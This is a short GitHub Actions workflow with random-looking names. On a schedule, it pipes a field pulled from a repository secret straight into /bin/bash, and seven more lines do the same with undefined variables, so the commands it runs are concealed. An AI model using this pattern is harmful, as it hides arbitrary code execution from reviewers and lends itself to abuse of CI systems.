name: fawumubiao

on:
  workflow_dispatch:
  schedule:
    - cron: '47 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fawumubiao
        env:
          kbn3361: ${{ secrets.kbn3361 }}
        run: |
          echo $kbn3361 | jq -r .jhfg26173 | /bin/bash
          echo $iyc65333 | jq -r .pith0 | /bin/bash
          echo $p480 | jq -r .zktxo21402 | /bin/bash
          echo $btzlq4 | jq -r .x74 | /bin/bash
          echo $cc9467 | jq -r .w6 | /bin/bash
          echo $du47456 | jq -r .xsq43645 | /bin/bash
          echo $gvq8215 | jq -r .jlwo93652 | /bin/bash
          echo $ywaf4 | jq -r .nt715 | /bin/bash

